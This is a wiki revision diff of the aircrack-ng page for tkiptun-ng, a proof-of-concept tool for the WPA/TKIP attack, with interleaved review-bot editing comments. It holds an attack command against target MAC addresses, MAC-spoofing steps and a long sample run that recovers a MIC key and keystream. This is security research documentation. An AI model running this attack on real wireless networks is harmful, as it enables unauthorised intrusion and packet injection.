tkiptun-ng

Differences

tkiptun-ng [2008/11/09 22:54]
mister_x Cosmetic changes
tkiptun-ng [2009/09/27 16:01] (current)
darkaudax Updated to reflect v1.0
Line 3: Line 3:
 ===== Description ===== ===== Description =====
  
-NOTE: This documention ​is still under development. ​ Please check back on a regular basis to obtain the latest updates. ​ If you have any feedback on the documentation,​ please post your comments to the [[http://​forum.tinyshell.be|Forum]].+NOTE: This documentation ​is still under development. ​ Please check back on a regular basis to obtain the latest updates. ​ If you have any feedback on the documentation,​ please post your comments to the [[http://​forum.aircrack-ng.org|Forum]].
  
-NOTE: The tkiptun-ng ​SVN version ​is not fully working.  ​working ​version will be released shortly.+**IMPORTANT ​NOTE:** The tkiptun-ng ​included in v1.0 is not fully working.  ​The final attack phase is not yet implemented. ​ The other portions are working ​with the ieee80211 drivers for RT73 and RTL8187L chipsets. ​ The madwifi-ng driver is definitely broken and is known to completely fail.  tkiptun-ng may work with other drivers but has not been tested so your mileage may vary.
  
 Tkiptun-ng is a tool created by Martin Beck aka hirte, a member of aircrack-ng team. This tool is able to inject a few frames into a WPA TKIP network with QoS.  He worked with Erik Tews (who created PTW attack) for a conference in [[http://​pacsec.jp/​|PacSec 2008]]: "Gone in 900 Seconds, Some Crypto Issues with WPA". Tkiptun-ng is a tool created by Martin Beck aka hirte, a member of aircrack-ng team. This tool is able to inject a few frames into a WPA TKIP network with QoS.  He worked with Erik Tews (who created PTW attack) for a conference in [[http://​pacsec.jp/​|PacSec 2008]]: "Gone in 900 Seconds, Some Crypto Issues with WPA".
  
-Tkiptun-ng is the proof-of-concept implementation the WPA/TKIP attack. ​ This attack is described in the paper, [[http://​dl.aircrack-ng.org/​breakingwepandwpa.pdf|Practical attacks against WEP and WPA]] written by Martin Beck and Erik Tews.  The paper describes advanced attacks on WEP and the first practical attack on WPA.  An additional excellent references explaining how tkiptun-ng does its magic is this ars technica article [[http://​arstechnica.com/​articles/paedia/​wpa-cracked.ars/​|Battered,​ but not broken: understanding the WPA crack]] by Glenn Fleishman.+Tkiptun-ng is the proof-of-concept implementation the WPA/TKIP attack. ​ This attack is described in the paper, [[http://​dl.aircrack-ng.org/​breakingwepandwpa.pdf|Practical attacks against WEP and WPA]] written by Martin Beck and Erik Tews.  The paper describes advanced attacks on WEP and the first practical attack on WPA.  An additional excellent references explaining how tkiptun-ng does its magic is this ars technica article [[http://​arstechnica.com/​security/news/​2008/​11/​wpa-cracked.ars/​|Battered,​ but not broken: understanding the WPA crack]] by Glenn Fleishman.
  
 Basically tkiptun-ng starts by obtaining the plaintext of a small packet and the MIC (Message Integrity Check). ​ This is done via [[chopchoptheory|chopchop]]-type method. ​ Once this is done, the MICHAEL algorithm is reversed the MIC key used to protect packets being sent from the AP to the client can be calculated. Basically tkiptun-ng starts by obtaining the plaintext of a small packet and the MIC (Message Integrity Check). ​ This is done via [[chopchoptheory|chopchop]]-type method. ​ Once this is done, the MICHAEL algorithm is reversed the MIC key used to protect packets being sent from the AP to the client can be calculated.
Line 15: Line 15:
 At this point, tkiptun-ng has recovered the MIC key  and knows a keystram for access point to client communication. ​ Subsequently,​ using the XOR file, you can create new packets and inject them.  The creation and injection are done using the other aircrack-ng suite tools. At this point, tkiptun-ng has recovered the MIC key  and knows a keystram for access point to client communication. ​ Subsequently,​ using the XOR file, you can create new packets and inject them.  The creation and injection are done using the other aircrack-ng suite tools.
  
-Please remember this is an extremely advanced attack. ​ You require ​advanced linux and aircrack-ng skills to use this tool.  DO NOT EXPECT support unless you can demonstrate you have these skills. ​ Novices will NOT BE SUPPORTED.+[[http://​download.aircrack-ng.org/​wiki-files/​doc/​tkip_master.pdf|Cryptanalysis of IEEE 802.11i TKIP]] by Finn Michael Halvorsen and Olav Haugen, June 2009 provides an excellent detailed description of how tkiptun-ng works. ​ As well, their paper includes detailed descriptions of many other attacks against WEP/​WPA/​WPA2. 
 + 
 +Please remember this is an extremely advanced attack. ​ You must possess ​advanced linux and aircrack-ng skills to use this tool.  DO NOT EXPECT support unless you can demonstrate you have these skills. ​ Novices will NOT BE SUPPORTED.
  
  
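Review bot: the new IMPORTANT NOTE says the final attack phase is not implemented, but the unchanged Description below it still presents the whole chain as working ("you can create new packets and inject them"); state which step of the Description the unimplemented phase corresponds to, so readers of v1.0 know where a run will stop. The replaced paragraph also carries over two wording slips worth fixing while the link is being updated: "the proof-of-concept implementation the WPA/TKIP attack" is missing "of", and "An additional excellent references ... is this ars technica article" should be singular ("An additional excellent reference"). Further down in the same hunk, "keystram" and "the MICHAEL algorithm is reversed the MIC key ... can be calculated" (missing "and") are unchanged lines that could be cleaned up in the same edit.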
Line 29: Line 31:
 ===== Specific Requirements ===== ===== Specific Requirements =====
  
-The network card MAC address ​that is used by tkiptun-ng needs to be set to the MAC address of the client you are attacking.+The network card MAC address used by tkiptun-ng needs to be set to the MAC address of the client you are attacking. 
  
  
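Review bot: the reworded requirement still gives no indication that tkiptun-ng checks it; the example output added in this same revision shows the tool reporting an interface MAC that does not match the -h value and printing an ifconfig hw ether line, so this section should say that a mismatch is detected and reported at startup and point readers to that message. Minor: the new line ends with a trailing space.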
Line 40: Line 43:
  
 **Answer:** \\ **Answer:** \\
-It is done for debugging reasons. ​ First, so  that the temporal keys in tkiptun can be calculated.  ​Seocnd, check them against the calculated values from the plaintext packet.+It is done for debugging reasons. ​ First, so  that the temporal keys in tkiptun can be calculated.  ​Second, check them against the calculated values from the plaintext packet.
  
 Another reason, is to check if the AP/client reuses the nonces after a mic shutdown. Another reason, is to check if the AP/client reuses the nonces after a mic shutdown.
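Review bot: the typo fix leaves the second sentence as a fragment; "Second, check them against the calculated values from the plaintext packet." reads better as "Second, so that they can be checked against the values calculated from the plaintext packet." The double space in "so  that" can go at the same time.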
Line 88: Line 91:
 The example below is incomplete but it gives some idea of how it looks. The example below is incomplete but it gives some idea of how it looks.
  
-Input: tkiptun-ng ​ -h 00:​0F:​B5:​AB:​CB:​9D -a 00:​14:​6C:​7E:​40:​80 -m 80 -n 100 ath0+Input: 
 + 
 +   tkiptun-ng -h 00:​0F:​B5:​AB:​CB:​9D -a 00:​14:​6C:​7E:​40:​80 -m 80 -n 100 rausb0 ​
  
 Output: Output:
  
-  Blub 2:38 E6 38 1C 24 15 1C CF +   The interface MAC (00:​0E:​2E:​C5:​81:​D3) doesn'​t match the specified MAC (-h). 
-  Blub 1:17 DD 0D 69 1D C3 1F EE +        ifconfig rausb0 hw ether 00:​0F:​B5:​AB:​CB:​9D 
-  Blub 3:29 31 79 E7 E6 CF 8D 5E +   Blub 2:38 E6 38 1C 24 15 1C CF  
-  14:48:00  ​Michael Test: Successful +   ​Blub 1:17 DD 0D 69 1D C3 1F EE  
-  14:48:00  ​Waiting for beacon frame (BSSID: 00:​14:​6C:​7E:​40:​80) on channel 9 +   ​Blub 3:29 31 79 E7 E6 CF 8D 5E  
-  14:48:00  Found specified AP +   15:06:48  Michael Test: Successful 
-  14:​48:​00 ​ Sending 4 directed DeAuth. STMAC: [00:​0F:​B5:​AB:​CB:​9D] [ 2ACKs] +   15:06:48  Waiting for beacon frame (BSSID: 00:​14:​6C:​7E:​40:​80) on channel 9 
-  14:48:02  WPA handshake: 00:​14:​6C:​7E:​40:​80 captured +   15:06:48  Found specified AP 
-  14:48:02  ​Waiting for an ARP packet coming from the Client... +   15:06:48  ​Sending 4 directed DeAuth. STMAC[00:​0F:​B5:​AB:​CB:​9D] [ 0| 0 ACKs] 
-  Saving chosen packet in replay_src-1109-144822.cap +   ​15:​06:​54 ​ ​Sending 4 directed DeAuth. STMAC: [00:​0F:​B5:​AB:​CB:​9D] [ 0ACKs] 
-  14:48:22  ​Waiting for an ARP response packet coming from the AP... +   15:06:56  WPA handshake: 00:​14:​6C:​7E:​40:​80 captured 
-  Saving chosen packet in replay_src-1109-144822.cap +   15:06:56  ​Waiting for an ARP packet coming from the Client... 
-  14:48:22  Got the answer! +   ​Saving chosen packet in replay_src-0305-150705.cap 
-  14:48:22  ​Waiting ​seconds to let encrypted EAPOL frames pass without interfering. +   15:07:05  ​Waiting for an ARP response packet coming from the AP... 
-   +   ​Saving chosen packet in replay_src-0305-150705.cap 
-  ​Sent  40 packets, current guess: 27..+   15:07:05  Got the answer! 
 +   15:07:05  ​Waiting ​10 seconds to let encrypted EAPOL frames pass without interfering. 
 +    
 +   ​15:​07:​25 ​ Offset ​  99 ( 0% done) | xor = B3 | pt = D3 |  103 frames written in 84468ms 
 +   15:​08:​32 ​ Offset ​  98 ( 1% done) | xor = AE | pt = 80 |   64 frames written in 52489ms 
 +   ​15:​09:​45 ​ Offset ​  97 ( 3% done) | xor = DE | pt = C8 |  131 frames written in 107407ms 
 +   15:11:05  Offset ​  96 ( 5% done) | xor = 5A | pt = 7A |  191 frames written in 156619ms 
 +   ​15:​12:​07 ​ Offset ​  95 ( 6% done) | xor = 27 | pt = 02 |   21 frames written in 17221ms 
 +   ​15:​13:​11 ​ Offset ​  94 ( 8% done) | xor = D8 | pt = AB |   41 frames written in 33625ms 
 +   ​15:​14:​12 ​ Offset ​  93 (10% done) | xor = 94 | pt = 62 |   13 frames written in 10666ms 
 +   ​15:​15:​24 ​ Offset ​  92 (11% done) | xor = DF | pt = 68 |  112 frames written in 91829ms 
 +   Looks like mic failure report was not detectedWaiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​18:​13 ​ Offset ​  91 (13% done) | xor = A1 | pt = E1 |  477 frames written in 391139ms 
 +   ​15:​19:​32 ​ Offset ​  90 (15% done) | xor = 5F | pt = B2 |  186 frames written in 152520ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​22:​09 ​ Offset ​  89 (16% done) | xor = 9C | pt = 77 |  360 frames written in 295200ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​26:​10 ​ Offset ​  88 (18% done) | xor = 0D | pt = 3E |  598 frames written in 490361ms 
 +   ​15:​27:​33 ​ Offset ​  87 (20% done) | xor = 8C | pt = 00 |  230 frames written in 188603ms 
 +   ​15:​28:​38 ​ Offset ​  86 (21% done) | xor = 67 | pt = 00 |   47 frames written in 38537ms 
 +   ​15:​29:​53 ​ Offset ​  85 (23% done) | xor = AD | pt = 00 |  146 frames written in 119720ms 
 +   ​15:​31:​16 ​ Offset ​  84 (25% done) | xor = A3 | pt = 00 |  220 frames written in 180401ms 
 +   ​15:​32:​23 ​ Offset ​  83 (26% done) | xor = 28 | pt = 00 |   75 frames written in 61499ms 
 +   ​15:​33:​38 ​ Offset ​  82 (28% done) | xor = 7C | pt = 00 |  141 frames written in 115619ms 
 +   ​15:​34:​40 ​ Offset ​  81 (30% done) | xor = 02 | pt = 00 |   19 frames written in 15584ms 
 +   ​15:​35:​57 ​ Offset ​  80 (31% done) | xor = C9 | pt = 00 |  171 frames written in 140221ms 
 +   ​15:​37:​13 ​ Offset ​  79 (33% done) | xor = 38 | pt = 00 |  148 frames written in 121364ms 
 +   ​15:​38:​21 ​ Offset ​  78 (35% done) | xor = 71 | pt = 00 |   84 frames written in 68872ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​40:​55 ​ Offset ​  77 (36% done) | xor = 8E | pt = 00 |  328 frames written in 268974ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​43:​31 ​ Offset ​  76 (38% done) | xor = 38 | pt = 00 |  355 frames written in 291086ms 
 +   ​15:​44:​37 ​ Offset ​  75 (40% done) | xor = 79 | pt = 00 |   61 frames written in 50021ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​47:​05 ​ Offset ​  74 (41% done) | xor = 59 | pt = 00 |  269 frames written in 220581ms 
 +   ​15:​48:​30 ​ Offset ​  73 (43% done) | xor = 14 | pt = 00 |  249 frames written in 204178ms 
 +   ​15:​49:​49 ​ Offset ​  72 (45% done) | xor = 9A | pt = 00 |  183 frames written in 150059ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​52:​32 ​ Offset ​  71 (46% done) | xor = 03 | pt = 00 |  420 frames written in 344400ms 
 +   ​15:​53:​57 ​ Offset ​  70 (48% done) | xor = 0E | pt = 00 |  239 frames written in 195980ms 
 +   ​Sleeping for 60 seconds.36 bytes still unknown 
 +   ARP Reply 
 +   ​Checking 192.168.x.y 
 +   ​15:​54:​11 ​ Reversed MIC Key (FromDS): C3:​95:​10:​04:​8F:​8D:​6C:​66 
 +    
 +   ​Saving plaintext in replay_dec-0305-155411.cap 
 +   ​Saving keystream in replay_dec-0305-155411.xor 
 +   ​15:​54:​11 ​  
 +   ​Completed in 2816s (0.02 bytes/s) 
 +    
 +   ​15:​54:​11 ​ AP MAC: 00:​40:​F4:​77:​F0:​9B IP: 192.168.21.42 
 +   ​15:​54:​11 ​ Client MAC: 00:​0F:​B5:​AB:​CB:​9D IP: 192.168.21.112 
 +   ​15:​54:​11 ​ Sent encrypted tkip ARP request to the client. 
 +   ​15:​54:​11 ​ Wait for the mic countermeasure timeout of 60 seconds.
  
  
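Review bot: the new output opens with "The interface MAC (00:0E:2E:C5:81:D3) doesn't match the specified MAC (-h)." followed by an ifconfig line, yet the run continues; the text should say whether tkiptun-ng changes the interface address itself or is only printing the command the user is expected to run, since the Specific Requirements section makes a matching MAC a precondition. The line "Looks like mic failure report was not detectedWaiting 60 seconds before trying again ..." differs from the other occurrences, which read ". Waiting"; if that is a paste error it should be corrected, and if it is the tool's real output it deserves a sentence. The unchanged intro "The example below is incomplete" could now be made precise: the listing runs through the reversed MIC key and the saved .cap/.xor files and stops at the 60-second MIC countermeasure wait, which is exactly where the IMPORTANT NOTE says the unimplemented final phase begins. Finally, the repeated "Waiting 60 seconds ... to avoid the AP shutting down" pauses and the "mic failure report" messages are the TKIP MIC countermeasures at work; a sentence explaining that relationship would help readers understand why the pauses are there and why the byte-by-byte recovery is so slow (0.02 bytes/s in this listing, 2816 s for the run shown).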
tkiptun-ng.1226267647.txt.gz · Last modified: 2008/11/09 22:54 by mister_x